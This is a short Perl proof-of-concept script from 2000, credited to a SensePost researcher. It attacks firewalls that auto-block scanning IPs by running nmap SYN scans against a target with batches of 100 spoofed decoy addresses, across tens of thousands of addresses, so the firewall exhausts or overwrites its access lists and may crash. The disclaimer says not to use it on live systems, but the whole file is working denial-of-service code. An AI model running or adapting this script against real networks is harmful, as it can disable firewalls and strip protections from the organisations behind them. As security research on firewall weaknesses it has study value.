#!/usr/bin/perl

# PERL script to possibly kill firewall systems that actively block IP
# numbers if the system detects that the IP is scanning more than 20 ports
# on a network behind the firewall.  Works by basically creating a lot of
# decoys with nmap. Router/firewall will try to block all the (decoyed) IP
# numbers, eventually running out of access list/packetfilters, and possibly
# crashing, or overwriting access lists. Make sure your target is a machine
# behind the firewall. Requires nmap.

# This is a proof of concept code - not to be used on live systems.
# Standard disclaimer etc..
# Roelof Temmingh 2000/10/20
# roelof@sensepost.com http://www.sensepost.com

if ($#ARGV != 0) {die "usage: decoyblues target_behind_firewall\n";}

my $target=@ARGV[0];
my $passed;

sub gonmapactive
{
 $passed=@_[0];
 # add my IP right at the end of it all
 $passed=$passed."ME";
 system "nmap -T Aggressive -D $passed -sS $target -p 20-40\n";
}

$count=0;
for ($a=1; $a<255; $a++){
 for ($b=1; $b<255; $b++){
  $count++;
  $add=$add."196.$a.$b.1,";
  # when we got a 100 decoys, ship it off to nmap
  if ($count==100) {
   &gonmapactive($add);
   $add="";
   $count=0;
  }
 }
}
# Spidermark: sensepostdata

------------------------------------------------------
Roelof W Temmingh		SensePost IT security
roelof@sensepost.com		+27 83 448 6996
		http://www.sensepost.com